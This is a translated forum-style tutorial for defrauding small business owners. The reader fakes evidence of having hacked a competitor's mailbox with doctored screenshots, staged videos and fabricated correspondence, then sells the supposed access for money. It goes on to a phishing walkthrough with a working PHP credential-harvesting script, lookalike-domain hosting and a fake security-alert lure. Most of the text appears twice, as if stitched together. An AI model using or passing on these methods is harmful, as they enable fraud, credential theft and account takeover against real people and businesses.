Throughout all time, people were such beings who were never given rest by other people's secrets, other people's success, other people's knowledge. In those distant times, in the pursuit of secret knowledge, a war could easily break out. A multi-year war.
In our time, wars, thank God (Allah, Buddha), do not start, but still want to know the secrets of other people. The husband wants to know what his wife writes about, the children want to know the correspondence of their friends and classmates. Colleagues at work want to know what the director is thinking in his notes, and vice versa. But there is among all these people one peculiar "caste" of those for whom secrets and knowledge are valued comparable to gold. And this caste is called COMPETITORS!
Let's analyze a small example so that you can understand the train of thought. After reading it, you should immediately understand the whole scheme!
Imagine you are producing water. Regular drinking water. And you sell it to your customers. But there's your neighbor across the street who does the same thing. He's one of your competitors. And it seems that you have an excellent pricing policy, and the service is well established, and you have been on the market for more than one year. But your competitor still continues to exist. Thus, it is logical to assume that the customers who could be yours are his! The key catch is that you don't know who these customers are. You also don't know what kind of hardware your competitor is using.
Go to the competitor directly and ask? Theoretically, you can, but somehow he probably won't be loyal to you and won't want to share his secrets. You can make a test purchase, but this option will also not give anything sensible... Hmm, what should I do? Did you guess? If not, then look further:
You are sitting there thinking and reasoning, and then a STRANGER appears and says to you: "Friend, do you want me to give you the mail of your competitor, from which you can see with whom and who does business?". How likely are you to agree?
99%. That's the whole scheme, if you describe it in a couple of sentences.
Now we will analyze it in order. It's time to train your SI skills. I call my method "fishing". Read very carefully and thoughtfully!!!
So, we have 3 characters: A, B, B. A and B are sellers of a certain product. B is their common customer.
Choosing a business branch. Don't take a swing at industry giants. Take ordinary private traders, sellers of certain types of goods. For example, flour merchants. (this is just an example!!!) Opened 2gis, drove the "sale of flour" and chose the most suitable options. These will be those who are engaged in small wholesale. It is not difficult to understand this, just look at their website or, in extreme cases, call and ask directly. So, we found sellers A. and B. Let's start with A (cast a fishing rod).
⦁ After that, we need to find out at least one or two customers of A. How do I do this? It's very simple: we call seller A (preferably from a SIM card that you don't use), or write to the mail and say that we would like to buy flour, what is it for, how much does it cost, etc. Then we say that we are interested in 5-10 bags (small wholesale), we are interested in long-term cooperation, like, and the price is good and the conditions are acceptable. And here we give the bait, asking: ARE THERE ANY PEOPLE WHO COULD RECOMMEND YOU? IT'S JUST THAT THERE ARE NO REVIEWS.
As a rule, the seller will lose his vigilance a little and most likely name one or two buyers (B) with whom he works. Great, that's what we need! We end the conversation with a phrase like thank you, check with the management (or just think about it), and let you know. Don't forget to ask your email address for feedback (if it's not listed on the site).)
After the fish is caught, it's time to put it in the pan. To do this, open photoshop (I did this). You can use the item code. You can simulate email correspondence (create multiple mailboxes and send yourself emails with specific topics, in this case with flour orders)! We need to take a SCREENSHOT of the SELLER's MAILBOX
A. Looking at the screen.
Remember, you should always have accounting documents, letters from the transport company, and product requests there. We made a high-quality screen, saved it!
⦁ We write to the mail of the flour seller B. (we write from the left mailbox)
"Good afternoon! My name is Arthur. Your competitor ordered us to hack your mailbox and paid $ 100 (200, 500, 1000). But by his own mistake, he gave us access to his own. Actually, we are not interested in flour, as well as your business in general. And fair competition is always better than unfair competition. Therefore, I suggest the following option: $ 100 (200, 500, 1000) and I will give you the username and password from his mail. If you agree, transfer the amount to your bank card (here it is a Qiwi card). As a guarantee, I can send you a screenshot from their mailbox»
Here is a simple letter. You can add something on your own. Please understand that we have not chosen flour sellers for nothing. These are people who are interested in profit. And in war, all means are good for them. Therefore, at most they will ask for a guarantee. We send them a screenshot from the mailbox. And here the trick is that A and B most likely know the buyer (C). Therefore, when they see the email from SE in the screenshot, seller B will lose all vigilance and agree to the deal! I guarantee you that.
⦁ Money dropped. We went off into the sunset.
After some time (a week or a week and a half), we work according to the same scheme with seller A.
Here is a seemingly elementary scheme that carries golden testicles. This manual works in 90% of cases (if you choose the right sellers). It is important not to rush, fishing does not like fuss.
If he has recently had correspondence with Seller B.
(I think everything is clear here, he will merge the dates of emails and realize that we have a fake)
If the screenshot isn't plausible enough.
(design errors)
If our patient knows client B personally.
So, on the first point. It's pure SI. If client A. tells us that his email is not in B.'s mailbox, we simply write: "just a minute." And after a while we reply that we checked the mailbox, most likely it deleted the message!
On the second point: if there are problems with the fsh and the element code, then you can do it as follows: you create fake mailboxes, 30 of them. And you create Seller B.'s mailbox (which we allegedly hacked). Then you start writing to this email address. The letters should contain RECONCILIATION REPORTS, FLOUR ORDERS, ADVERTISING LETTERS, ANY GARBAGE, PERSONAL CORRESPONDENCE. Make the headers in the email topics appropriate. And look what a trick: you send one advertising letter to both fake mail and the seller's mail!! Got the idea?
IT IS IMPORTANT TO UNDERSTAND THAT EDITING THE EMAIL DATE IS MANDATORY. Of course, it happens that emails are sent 30 times a day. But it's still better to make it more improbable. Therefore, emails should be in many folders. You can even create separate folders called "DELIVERY", "ACCOUNTING", etc.
On the third point, everything is clear, if the clients know each other personally, then there is nothing you can do.
WHAT IS YOUR PROOF?
What could be better than a screenshot? That's right, a video of you logging in to a competitor's email! A fake mailbox is created for this purpose. But you need to do it very competently (as I wrote above, fill it out according to your mind: letters from the TC, reconciliation reports, applications.) Then you record on the video how you enter your username (the username must match what B. uses) and password. Then scroll with the mouse and open the spam, deleted, and sent folders. You do all this quickly.
IF CLIENT A. SAYS THAT SEND ME AN EMAIL FROM MAILBOX B. We reply that "this doesn't make sense, since there is a chance that this action will be noticed. We don't need any extra fuss.»
We must show ourselves to be professionals in our field. In theory, you can even use the caption to your email (the one where you say A. about the fact that you have access to the competitor's mail) give a link to forums with reviews of those guys who are really engaged in hacking (I can give an example if anyone needs it, but the vehicle disappeared somewhere, although the branch has been working since 2013) The probability that A. will unsubscribe in their branch is extremely small. But the presence of reviews will increase you in the eyes of customer A.
REAL HACKING
But this is the most interesting part. Let's try to really hack seller B. The best way to do this is to fake your login starnitsa. How do I make it? You can order for a penny, or you can make it yourself. Here is a copy paste from one forum:
A fake is a fake web page that looks the same as the original one, but was created to transmit the passwords entered on it to the creator. That is, when you enter a fake password, it is saved (the creator will then go in and read it), and you are transferred to the real site.
How to make a fake account yourself
Now it would be a good idea to consider the process of creating such pages (fakes), namely, to learn more about all the above-mentioned operations performed with real pages. As mentioned earlier, this is copying, modifying, and posting.
Copying. This is the very first stage that we perform to make our page look identical to the real one. So that the user who goes there sees the usual and familiar login form and enters their username and password (and gives them to us) without thinking about the page address. So, how do we copy?
Up to my ears in html. What you see is called the html code of the page (also known as the source code of the page, or just the code). When you saved the page, there were probably signatures next to the field for entering your username and password (it is logical to assume that it said \"login\", \"password\" ). Here we will be guided by them. We are looking for such words among all this ugliness. Next to them on the page, we had the login and pass fields located. In the html code, they will look something like this:
field names (highlighted in bold, followed by \"name=\" in the code) will not always be exactly login and password. Somewhere it can be e-mail and pass, and somewhere and username, password. It depends on the imagination of those who coded the page, it is important for us to be able to see the names of these fields among all the other code! Another hint: the block with the labels \ " login\", \ "password\" and input forms is almost always located in the <form>tag. The next step is to remember (or rather temporarily write down) the names of these fields.
Here we are interested in everything that is underlined, namely the action parameter. in order for our fake to work, we need to run our somewhat tricky script after the user enters the value (okay, okay, I'll tell you what the script is soon ). Let's say we have it called login.php. So we set the action parameter to login.php (if the action parameter isn't there, enter it yourself: action=\"login.php\"). You should also pay attention to the method parameter (in the same line as form and action): it can have the value post or get.
This mysterious script… As promised, I will now tell you about the purpose of the mysterious script, which I mentioned more than once earlier in this lesson. It will perform the function of intercepting and recording the username and password entered in the fields. In Russian, this script will record the username and password of the deceived user. The script itself is not very large and not complicated, it is written in php (I already mentioned it in the last lesson) and looks like this:
Now we'll figure out what's what…
In the first two lines, the Log and Pass variables are assigned the values of the corresponding fields from the previous file. This is why we recorded the names of fields from the saved page: we need to specify them to the script. Changing the login and password from square brackets to the name of the input fields on our saved page (E! Don't touch the quotation marks!).
The third line opens the file database.txt for recording purposes. You can name this file whatever you want, though IIACCbI_JIOXOB.txt)) The main thing — do not forget what you called it (the name should be written in English letters) and create a text document with that name in the folder with the fake.
The fourth line is an entry in the file of a string of the form \\n $Log:$Pass \\n, where \\n is a transition to a new line, $Log:$Pass-values of variables with a username and password, separated by a colon.
Line five - saving and closing the file.
The last line is a redirect to another page (until the user finds out that this is fake). In this line, after URL=, enter the address of the page where the user will get immediately after entering the username and password (and again, be careful with the quotation mark after the address — it should be there!). It is best to send it to the real page (well, where did you copy the page from?) with a message about entering an invalid password. Then the poor guy will decide that he entered something wrong, poporb again and go in without suspecting anything!
So, we edited the script as we need, saved it to a file with the name login.php (pay attention to the extension, or else save it as login.php.txt ) to the fake folder.
Testing. This is where the localhost server comes in handy! If you don't have one, this is a great reason to install it! TYC. If you are stupidly lazy, you can skip testing and go straight to posting a fake on the Internet, and then test it. So, start the localhost server (except for MySQL, we don't need it now) and upload files from the fake folder to the server (htdocs folder, remember?). Open localhost in your browser. The page we saved should load. On it, enter your username and password (whatever you want in English letters and numbers).
We post fake news on the Internet. All we need for this is a free hosting service with php support (for example, freehostia). We need Php in order for our script to work, but we choose the free one for obvious reasons. We need to register a domain on this host (a page on the Internet) with an address (name) similar to the address of the page we are forging. For example, you make a fake site mail.ru, so you need to register something like mait, nail, moil, majl, etc. (you can also use mail if the host is free).
Attention! With three small differences:
Instead of the htdocs folder, we upload everything to our host using ftp or through the file manager. You will find it in the host's control panel, although it can be called either \ " files\ "or \"file manager\". Figure it out, I hope
Instead of localhost, we will open the address that we registered. Accordingly, the file with the saved passwords will be located in the same place (http://наш_адрес/database.txt).
In the same file manager, make sure to set the file name to database.txt (or whatever you call it?) maximum access rights — 777
Our fake is ready! All that remains is to make sure that the user goes there and enters their password.
We lure the victim to a fake account. At this point, we'll have to improvise. First, you need to come up with an excuse under which the victim must follow the link and enter their username and password on the corresponding resource. It all depends on the subject of the site you forged and the interests of the victim. Actually, only you can figure out how you will sell the link.
One small caveat remains: the address of our fake site does not correspond to the address of the real resource, and the victim may simply not believe you. There are two options here. The first is to say that this is supposedly an alternative authorization page or a page for admins (which will dramatically increase the victim's desire to log in there). The second option is to add some interesting text after the fake address. Let me explain. Let's say the address of the real site was http://site.ru/, and the address of the fake email we created — http://site.ourhoster.com/.
Next, we write in the victim's mailbox that we forgot your password and ask you to reset it via text message. At the same time, we send a message from the support mail (mail, Yandex, etc. of course, we are doing a fake) to B.'s email that intruders tried to log in to your account. To protect yourself from this action, complete authorization. Sincerely, the mail team.
And we give you a link to our fake email address. All. The client will bite. A schoolboy may not bite, a very advanced user may not bite, but an ordinary person (with whom we work) will be led one hundred percent. THIS IS PROVEN! And then, we can safely ask not $ 100, but all $ 500! And even more!
That way, if we succeed, we won't even have to lie to A. Everything is fair. And there is a chance that he will recommend us to someone else in the future.
BY SOMEONE ELSE'S HANDS
If there are those who can hack the necessary mailbox for us, then you can use their services. Give them your email address and see what algorithm they will use (this will be useful for your own hacking). Most likely, it will be phishing. They can't hack you, but they can hack the seller. The main thing is no prepayments. Ask for maximum proof!
RESUME
AS YOU CAN SEE, THERE IS NOTHING COMPLICATED. THE MAIN THING IS TO TAKE YOUR TIME AND BE ATTENTIVE TO DETAILS. WE MADE A DEAL ONCE (FOR EXAMPLE, WITH FLOUR) AND LOOK FOR A SERVING FLOUR SELLER. YOU WILL NO LONGER HAVE TO PREPARE EVERYTHING IN ONE DAY. TRY OUT THE OPTIONS, YOU CAN OFFER TO MERGE ORDERS FOR 500 RUBLES. YOU CAN... YES, A LOT MORE THAT YOU CAN =)
In our time, wars, thank God (Allah, Buddha), do not start, but still want to know the secrets of other people. The husband wants to know what his wife writes about, the children want to know the correspondence of their friends and classmates. Colleagues at work want to know what the director is thinking in his notes, and vice versa. But there is among all these people one peculiar "caste" of those for whom secrets and knowledge are valued comparable to gold. And this caste is called COMPETITORS!
Let's analyze a small example so that you can understand the train of thought. After reading it, you should immediately understand the whole scheme!
Imagine you are producing water. Regular drinking water. And you sell it to your customers. But there's your neighbor across the street who does the same thing. He's one of your competitors. And it seems that you have an excellent pricing policy, and the service is well established, and you have been on the market for more than one year. But your competitor still continues to exist. Thus, it is logical to assume that the customers who could be yours are his! The key catch is that you don't know who these customers are. You also don't know what kind of hardware your competitor is using.
Go to the competitor directly and ask? Theoretically, you can, but somehow he probably won't be loyal to you and won't want to share his secrets. You can make a test purchase, but this option will also not give anything sensible... Hmm, what should I do? Did you guess? If not, then look further:
You are sitting there thinking and reasoning, and then a STRANGER appears and says to you: "Friend, do you want me to give you the mail of your competitor, from which you can see with whom and who does business?". How likely are you to agree?
99%. That's the whole scheme, if you describe it in a couple of sentences.
Now we will analyze it in order. It's time to train your SI skills. I call my method "fishing". Read very carefully and thoughtfully!!!
So, we have 3 characters: A, B, B. A and B are sellers of a certain product. B is their common customer.
Choosing a business branch. Don't take a swing at industry giants. Take ordinary private traders, sellers of certain types of goods. For example, flour merchants. (this is just an example!!!) Opened 2gis, drove the "sale of flour" and chose the most suitable options. These will be those who are engaged in small wholesale. It is not difficult to understand this, just look at their website or, in extreme cases, call and ask directly. So, we found sellers A. and B. Let's start with A (cast a fishing rod).
⦁ After that, we need to find out at least one or two customers of A. How do I do this? It's very simple: we call seller A (preferably from a SIM card that you don't use), or write to the mail and say that we would like to buy flour, what is it for, how much does it cost, etc. Then we say that we are interested in 5-10 bags (small wholesale), we are interested in long-term cooperation, like, and the price is good and the conditions are acceptable. And here we give the bait, asking: ARE THERE ANY PEOPLE WHO COULD RECOMMEND YOU? IT'S JUST THAT THERE ARE NO REVIEWS.
As a rule, the seller will lose his vigilance a little and most likely name one or two buyers (B) with whom he works. Great, that's what we need! We end the conversation with a phrase like thank you, check with the management (or just think about it), and let you know. Don't forget to ask your email address for feedback (if it's not listed on the site).)
After the fish is caught, it's time to put it in the pan. To do this, open photoshop (I did this). You can use the item code. You can simulate email correspondence (create multiple mailboxes and send yourself emails with specific topics, in this case with flour orders)! We need to take a SCREENSHOT of the SELLER's MAILBOX
A. Looking at the screen.
Remember, you should always have accounting documents, letters from the transport company, and product requests there. We made a high-quality screen, saved it!
⦁ We write to the mail of the flour seller B. (we write from the left mailbox)
"Good afternoon! My name is Arthur. Your competitor ordered us to hack your mailbox and paid $ 100 (200, 500, 1000). But by his own mistake, he gave us access to his own. Actually, we are not interested in flour, as well as your business in general. And fair competition is always better than unfair competition. Therefore, I suggest the following option: $ 100 (200, 500, 1000) and I will give you the username and password from his mail. If you agree, transfer the amount to your bank card (here it is a Qiwi card). As a guarantee, I can send you a screenshot from their mailbox»
Here is a simple letter. You can add something on your own. Please understand that we have not chosen flour sellers for nothing. These are people who are interested in profit. And in war, all means are good for them. Therefore, at most they will ask for a guarantee. We send them a screenshot from the mailbox. And here the trick is that A and B most likely know the buyer (C). Therefore, when they see the email from SE in the screenshot, seller B will lose all vigilance and agree to the deal! I guarantee you that.
⦁ Money dropped. We went off into the sunset.
After some time (a week or a week and a half), we work according to the same scheme with seller A.
Here is a seemingly elementary scheme that carries golden testicles. This manual works in 90% of cases (if you choose the right sellers). It is important not to rush, fishing does not like fuss.
PART 2
I will start with the moments when our client A. can refuse the transaction:If he has recently had correspondence with Seller B.
(I think everything is clear here, he will merge the dates of emails and realize that we have a fake)
If the screenshot isn't plausible enough.
(design errors)
If our patient knows client B personally.
So, on the first point. It's pure SI. If client A. tells us that his email is not in B.'s mailbox, we simply write: "just a minute." And after a while we reply that we checked the mailbox, most likely it deleted the message!
On the second point: if there are problems with the fsh and the element code, then you can do it as follows: you create fake mailboxes, 30 of them. And you create Seller B.'s mailbox (which we allegedly hacked). Then you start writing to this email address. The letters should contain RECONCILIATION REPORTS, FLOUR ORDERS, ADVERTISING LETTERS, ANY GARBAGE, PERSONAL CORRESPONDENCE. Make the headers in the email topics appropriate. And look what a trick: you send one advertising letter to both fake mail and the seller's mail!! Got the idea?
IT IS IMPORTANT TO UNDERSTAND THAT EDITING THE EMAIL DATE IS MANDATORY. Of course, it happens that emails are sent 30 times a day. But it's still better to make it more improbable. Therefore, emails should be in many folders. You can even create separate folders called "DELIVERY", "ACCOUNTING", etc.
On the third point, everything is clear, if the clients know each other personally, then there is nothing you can do.
WHAT IS YOUR PROOF?
What could be better than a screenshot? That's right, a video of you logging in to a competitor's email! A fake mailbox is created for this purpose. But you need to do it very competently (as I wrote above, fill it out according to your mind: letters from the TC, reconciliation reports, applications.) Then you record on the video how you enter your username (the username must match what B. uses) and password. Then scroll with the mouse and open the spam, deleted, and sent folders. You do all this quickly.
IF CLIENT A. SAYS THAT SEND ME AN EMAIL FROM MAILBOX B. We reply that "this doesn't make sense, since there is a chance that this action will be noticed. We don't need any extra fuss.»
We must show ourselves to be professionals in our field. In theory, you can even use the caption to your email (the one where you say A. about the fact that you have access to the competitor's mail) give a link to forums with reviews of those guys who are really engaged in hacking (I can give an example if anyone needs it, but the vehicle disappeared somewhere, although the branch has been working since 2013) The probability that A. will unsubscribe in their branch is extremely small. But the presence of reviews will increase you in the eyes of customer A.
REAL HACKING
But this is the most interesting part. Let's try to really hack seller B. The best way to do this is to fake your login starnitsa. How do I make it? You can order for a penny, or you can make it yourself. Here is a copy paste from one forum:
A fake is a fake web page that looks the same as the original one, but was created to transmit the passwords entered on it to the creator. That is, when you enter a fake password, it is saved (the creator will then go in and read it), and you are transferred to the real site.
How to make a fake account yourself
Now it would be a good idea to consider the process of creating such pages (fakes), namely, to learn more about all the above-mentioned operations performed with real pages. As mentioned earlier, this is copying, modifying, and posting.
Copying. This is the very first stage that we perform to make our page look identical to the real one. So that the user who goes there sees the usual and familiar login form and enters their username and password (and gives them to us) without thinking about the page address. So, how do we copy?
Up to my ears in html. What you see is called the html code of the page (also known as the source code of the page, or just the code). When you saved the page, there were probably signatures next to the field for entering your username and password (it is logical to assume that it said \"login\", \"password\" ). Here we will be guided by them. We are looking for such words among all this ugliness. Next to them on the page, we had the login and pass fields located. In the html code, they will look something like this:
Code:
<input type=\»text\» name=\»login\» value=\»\» ……
<input type=\»password\» name=\»password\» ……field names (highlighted in bold, followed by \"name=\" in the code) will not always be exactly login and password. Somewhere it can be e-mail and pass, and somewhere and username, password. It depends on the imagination of those who coded the page, it is important for us to be able to see the names of these fields among all the other code! Another hint: the block with the labels \ " login\", \ "password\" and input forms is almost always located in the <form>tag. The next step is to remember (or rather temporarily write down) the names of these fields.
Code:
<form name=\»login\» action=\»users/passcheck.php\» method=\»post\» onsubmit=\»return check();\»>Here we are interested in everything that is underlined, namely the action parameter. in order for our fake to work, we need to run our somewhat tricky script after the user enters the value (okay, okay, I'll tell you what the script is soon ). Let's say we have it called login.php. So we set the action parameter to login.php (if the action parameter isn't there, enter it yourself: action=\"login.php\"). You should also pay attention to the method parameter (in the same line as form and action): it can have the value post or get.
This mysterious script… As promised, I will now tell you about the purpose of the mysterious script, which I mentioned more than once earlier in this lesson. It will perform the function of intercepting and recording the username and password entered in the fields. In Russian, this script will record the username and password of the deceived user. The script itself is not very large and not complicated, it is written in php (I already mentioned it in the last lesson) and looks like this:
Code:
<?PHP
$Log = $_POST[\’login\’];
$Pass = $_POST[\’password\’];
$log = fopen(\»database.txt\»,\»at\»);
fwrite($log,\»\\n $Log:$Pass \\n\»);
fclose($log);
echo \»<html><head><META HTTP-EQUIV=\’Refresh\’ content =\’0; URL=http://lleo.aha.ru/na/\’></head></html>\»;
?>Now we'll figure out what's what…
In the first two lines, the Log and Pass variables are assigned the values of the corresponding fields from the previous file. This is why we recorded the names of fields from the saved page: we need to specify them to the script. Changing the login and password from square brackets to the name of the input fields on our saved page (E! Don't touch the quotation marks!).
The third line opens the file database.txt for recording purposes. You can name this file whatever you want, though IIACCbI_JIOXOB.txt)) The main thing — do not forget what you called it (the name should be written in English letters) and create a text document with that name in the folder with the fake.
The fourth line is an entry in the file of a string of the form \\n $Log:$Pass \\n, where \\n is a transition to a new line, $Log:$Pass-values of variables with a username and password, separated by a colon.
Line five - saving and closing the file.
The last line is a redirect to another page (until the user finds out that this is fake). In this line, after URL=, enter the address of the page where the user will get immediately after entering the username and password (and again, be careful with the quotation mark after the address — it should be there!). It is best to send it to the real page (well, where did you copy the page from?) with a message about entering an invalid password. Then the poor guy will decide that he entered something wrong, poporb again and go in without suspecting anything!
So, we edited the script as we need, saved it to a file with the name login.php (pay attention to the extension, or else save it as login.php.txt ) to the fake folder.
Testing. This is where the localhost server comes in handy! If you don't have one, this is a great reason to install it! TYC. If you are stupidly lazy, you can skip testing and go straight to posting a fake on the Internet, and then test it. So, start the localhost server (except for MySQL, we don't need it now) and upload files from the fake folder to the server (htdocs folder, remember?). Open localhost in your browser. The page we saved should load. On it, enter your username and password (whatever you want in English letters and numbers).
We post fake news on the Internet. All we need for this is a free hosting service with php support (for example, freehostia). We need Php in order for our script to work, but we choose the free one for obvious reasons. We need to register a domain on this host (a page on the Internet) with an address (name) similar to the address of the page we are forging. For example, you make a fake site mail.ru, so you need to register something like mait, nail, moil, majl, etc. (you can also use mail if the host is free).
Attention! With three small differences:
Instead of the htdocs folder, we upload everything to our host using ftp or through the file manager. You will find it in the host's control panel, although it can be called either \ " files\ "or \"file manager\". Figure it out, I hope
Instead of localhost, we will open the address that we registered. Accordingly, the file with the saved passwords will be located in the same place (http://наш_адрес/database.txt).
In the same file manager, make sure to set the file name to database.txt (or whatever you call it?) maximum access rights — 777
Our fake is ready! All that remains is to make sure that the user goes there and enters their password.
We lure the victim to a fake account. At this point, we'll have to improvise. First, you need to come up with an excuse under which the victim must follow the link and enter their username and password on the corresponding resource. It all depends on the subject of the site you forged and the interests of the victim. Actually, only you can figure out how you will sell the link.
One small caveat remains: the address of our fake site does not correspond to the address of the real resource, and the victim may simply not believe you. There are two options here. The first is to say that this is supposedly an alternative authorization page or a page for admins (which will dramatically increase the victim's desire to log in there). The second option is to add some interesting text after the fake address. Let me explain. Let's say the address of the real site was http://site.ru/, and the address of the fake email we created — http://site.ourhoster.com/.
Next, we write in the victim's mailbox that we forgot your password and ask you to reset it via text message. At the same time, we send a message from the support mail (mail, Yandex, etc. of course, we are doing a fake) to B.'s email that intruders tried to log in to your account. To protect yourself from this action, complete authorization. Sincerely, the mail team.
And we give you a link to our fake email address. All. The client will bite. A schoolboy may not bite, a very advanced user may not bite, but an ordinary person (with whom we work) will be led one hundred percent. THIS IS PROVEN! And then, we can safely ask not $ 100, but all $ 500! And even more!
That way, if we succeed, we won't even have to lie to A. Everything is fair. And there is a chance that he will recommend us to someone else in the future.
BY SOMEONE ELSE'S HANDS
If there are those who can hack the necessary mailbox for us, then you can use their services. Give them your email address and see what algorithm they will use (this will be useful for your own hacking). Most likely, it will be phishing. They can't hack you, but they can hack the seller. The main thing is no prepayments. Ask for maximum proof!
RESUME
AS YOU CAN SEE, THERE IS NOTHING COMPLICATED. THE MAIN THING IS TO TAKE YOUR TIME AND BE ATTENTIVE TO DETAILS. WE MADE A DEAL ONCE (FOR EXAMPLE, WITH FLOUR) AND LOOK FOR A SERVING FLOUR SELLER. YOU WILL NO LONGER HAVE TO PREPARE EVERYTHING IN ONE DAY. TRY OUT THE OPTIONS, YOU CAN OFFER TO MERGE ORDERS FOR 500 RUBLES. YOU CAN... YES, A LOT MORE THAT YOU CAN =)
